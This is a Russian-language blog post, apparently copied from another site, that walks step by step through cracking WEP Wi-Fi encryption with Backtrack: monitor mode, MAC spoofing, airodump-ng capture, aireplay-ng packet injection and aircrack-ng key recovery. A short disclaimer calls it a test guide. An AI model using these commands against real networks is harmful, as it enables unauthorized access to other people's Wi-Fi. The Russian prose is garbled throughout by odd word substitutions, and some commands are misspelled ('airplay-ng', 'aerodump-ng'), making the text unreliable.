
Я теснее повествовал в данном блоге про
Backtrack, в этой ведь заметке мы осмотрим одно из главнейших его применений.
То, о нежели я буду говорить в этой заметке, я теснее публиковал, хотя
повторяющий вид колёсиков с ютуба. В этой заметке я поясню все конкретнее. Не
ненужным станет обнаружить, собственно это пособие создано для тестовых целей,
и вовсе не ставит собственной целью взращивание хакеров. В этой объяснено каким
образом возможно взломать 64bit и 128bit WEP шифрование на разных WIFI роутерах
используя Backtrack, live-дистрибутив Linux. Я исполнял описанные воздействия
на ноутбуках IBM Thinkpad x60, Acer 5672 и WIFI чипсет в данных машинках трудился очень хорошо.
Требования:
Backtrack 3 на Компакт -диски либо USB
Комп с поддерживаемой беспроводной картой
802.11
Wireless Access point либо WIFI роутер,
использующий WEP шифрование
Подготавливаем
WIFI карту
В первую очередь нам следует перевести
карту в режим "Monitor Mode”. Раз вы примете на вооружение чипчет Intel® PRO/Wireless 3945ABG сделаете грядущую команду:
modprobe -r iwl3945 modprobe ipwraw
Затем нам следует приостановить нашу WIFI
карту:
iwconfig
Взгляни под каким именованием заметен ваш
беспроводной интерфейс, затем одернете его командой:
airmon-ng stop [device]
Потом:
ifconfig down [interface]
Изменяем MAC адресок прибора:
macchanger --mac 00:11:22:33:44:66 [device]
Запускаем карту:
airmon-ng start [device]

Начинаем атаку
И уже пришло время отыскать подобающую
сеть для атаки. Запускаем команду:
airodump-ng [device]
Мы видим легкодоступные сети, например
MAC адресок (BSSID), канал (CH) и фамилия (ESSID). Сейчас мы начнем собирать
эти с WIFI роутера для атаки:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

Команда повыше поместит приобретенные эти
в файл network.out. Данный файл потребуется , нам позже как скоро мы станем
готовы ломать WEP ключ.
Откройте иное окошко шелла и оставьте
предшествующую команду выполняться. И уже ведь мы сгенерируем немного фальшивых
пакетов к роутеру для ускорения сбора этих. Примите на вооружение грядущую
команду:
aireplay-ng -1 0 -a [bssid] -h
00:11:22:33:44:66 -e [essid] [device]

В случае если команда повыше прошла
удачно, мы станем генерить много пакетов на ломаемую сеть. Введите:
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66
[device]
Это принудит точку доступа отправить
много пакетов, которые у нас появится возможность принимать на вооружение для
взлома WEP ключа. Выясните ваш оставленный в первом окошке шелла aerodump-ng.
Вы обязаны узреть там поле "data”, в каком теснее очень большое количество
пакетов.

Как скоро значение данного поля
добивается 10,000-20,000 у вас есть возможность начинать взлом ключа. В случае
если нет иных легкодоступных сеток, можно испробовать команду:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h
00:11:22:33:44:66 [device]

Как скоро мы наберем довольно много
пакетов, начинаем взлом:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
Параметр "-n 128″ показывает
на 128-битный WEP ключ. В случае если взлом не выйдет, используйте "-n 64″

Все, наш взлом закончился! Ключ обнаружен
и нам осталось лишь удалить из вывода знаки :
Примите на вооружение эту технику для
презентации беспомощности WEP шифрования. Рассчитываю лично вы примете на
вооружение WPA2 в ваших сетях.
_____________________________________________________________________
информация взята с сайта http://guruadmin.ru
|